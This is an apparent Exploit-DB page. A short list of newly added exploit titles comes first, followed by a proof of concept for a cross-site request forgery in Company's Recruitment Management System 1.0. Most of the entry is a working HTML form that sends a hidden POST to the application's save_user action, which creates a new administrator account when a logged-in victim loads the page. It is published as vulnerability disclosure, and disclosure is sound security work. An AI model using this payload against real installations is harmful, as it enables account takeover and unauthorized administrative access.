0a3e0862c8
8 changes to exploits/shellcodes Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS) Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS) Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS) Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF) Plastic SCM 10.0.16.5622 - WebAdmin Server Access
28 lines
No EOL
1.1 KiB
Text
28 lines
No EOL
1.1 KiB
Text
# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
|
|
# Date: 18-10-2021
|
|
# Exploit Author: Aniket Anil Deshmane
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
|
|
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
|
|
# Version: 1
|
|
# Tested on: Windows 10,XAMPP
|
|
|
|
Detail:
|
|
The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.
|
|
|
|
CSRF POC:-
|
|
|
|
|
|
<html>
|
|
<!-- CSRF PoC - generated by Burp Suite Professional -->
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"
|
|
method="POST">
|
|
<input type="hidden" name="id" value="" />
|
|
<input type="hidden" name="fullname" value="Test" />
|
|
<input type="hidden" name="username" value="Test" />
|
|
<input type="hidden" name="type" value="1" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |